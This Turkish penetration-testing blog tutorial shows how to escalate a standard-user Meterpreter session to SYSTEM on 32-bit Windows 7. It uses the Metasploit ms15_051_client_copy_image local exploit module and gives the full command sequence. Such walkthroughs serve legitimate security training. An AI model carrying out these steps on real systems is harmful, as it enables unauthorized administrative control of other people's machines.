MSF ms15_051_client_copy_image İstismar Modülü ile İşletim Sistemindeki Hak Yükseltme Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, 32 bit mimarideki Windows 7 işletim sistemine sahip bir bilgisayarda, MS15-051 bültenine ait zafiyet MSF ms15_051_client_copy_image istismar modülü ile kötüye kullanılacak ve standart bir kullanıcı hesabı ile elde edilmiş Meterpreter bağlantısında hak yükseltilerek SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Standart yetkilerle elde edilen Meterpreter bağlantısında yerel yönetici hakları isteyen bir takım işlemlerin yapılamadığı görülmektedir.

sessions
sessions -i 1
ps -s
getsystem

escalating-privileges-on-windows-by-using-msf-ms15-051-client-copy-image-exploit-module-01
Mevcut durumda standart bir kullanıcı haklarına sahip olunduğu görülmektedir.

run post/windows/gather/win_privs

escalating-privileges-on-windows-by-using-msf-ms15-051-client-copy-image-exploit-module-02

Standart kullanıcı yetkilerine sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ms15_051_client_copy_image istismar modülü seçilir.

search ms15_051_client_copy_image
use exploit/windows/local/ms15_051_client_copy_image
show options

escalating-privileges-on-windows-by-using-msf-ms15-051-client-copy-image-exploit-module-03

Modüle, mevcut oturuma ait ID değeri verilir ve modül başlatılarak SYSTEM hakları elde edilir.

set SESSION 1
show options

escalating-privileges-on-windows-by-using-msf-ms15-051-client-copy-image-exploit-module-04

Modül çalıştırıldığında SYSTEM hakları ile çalışan “notepad.exe” adlı yeni bir prosesin başlatıldığı ve bu prosese enjekte olunarak yeni bir oturumun açıldığı görülmektedir.

exploit
getuid
getpid
ps -s

escalating-privileges-on-windows-by-using-msf-ms15-051-client-copy-image-exploit-module-05

Modül çalıştırıldıktan sonra SYSTEM yetkilerinin elde edildiği görülmektedir.

run post/windows/gather/win_privs

escalating-privileges-on-windows-by-using-msf-ms15-051-client-copy-image-exploit-module-06

Not: İkinci Meterpreter bağlantısı için payload bilgileri değiştirilerek de erişim gerçekleştirilebilir.

background
show options

escalating-privileges-on-windows-by-using-msf-ms15-051-client-copy-image-exploit-module-07

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.